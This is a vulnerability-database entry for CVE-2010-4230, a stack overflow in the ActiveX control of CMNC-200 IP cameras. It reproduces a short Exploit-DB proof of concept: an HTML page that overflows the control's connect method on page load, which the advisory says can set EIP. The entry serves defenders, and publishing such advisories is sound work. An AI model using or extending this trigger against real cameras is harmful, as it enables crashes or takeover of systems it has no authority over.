VIR Vulnerability Intelligence Relay

CVE-2010-4230

critical
Published 2010-11-17 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Stack-based buffer overflow in a certain ActiveX control for the Camtron CMNC-200 Full HD IP Camera and TecVoz CMNC-200 Megapixel IP Camera with firmware 1.102A-008 allows remote attackers to execute arbitrary code via a long string in the first argument to the connect method.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-15504 dos hardware verified text ยท 1 KB
Trustwave's SpiderLabs ยท 2010-11-13

Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow

text exploit Source: Exploit-DB 
Finding 1: Buffer Overflow in ActiveX Control
CVE: CVE-2010-4230

The CMNC-200 IP Camera ActiveX control identified by
CLSID {DD01C8CA-5DA0-4B01-9603-B7194E561D32} is vulnerable
to a stack overflow on the first argument of the connect method.
The vulnerability can be used to set the EIP register,
allowing a reliable exploitation.

The example code below triggers the vulnerability.

<html>
<head><title>IPcam POC</title>
<script>
function Check(){
    var bf1 = 'A';
    while (bf1.length <= 6144) bf1 = bf1 + 'A';
    obj.connect(bf1,"BBBB","CCCC");
}
</script>
</head>
<body onload=" Check();">
<object classid="clsid:DD01C8CA-5DA0-4B01-9603-B7194E561D32"
id="obj">
</object>
</html></body>

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.

Application impact
VendorProductVersionsFixed
camtroncmnc-200_firmware1.102a-008
tecvozcmnc-200_firmware1.102a-008

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.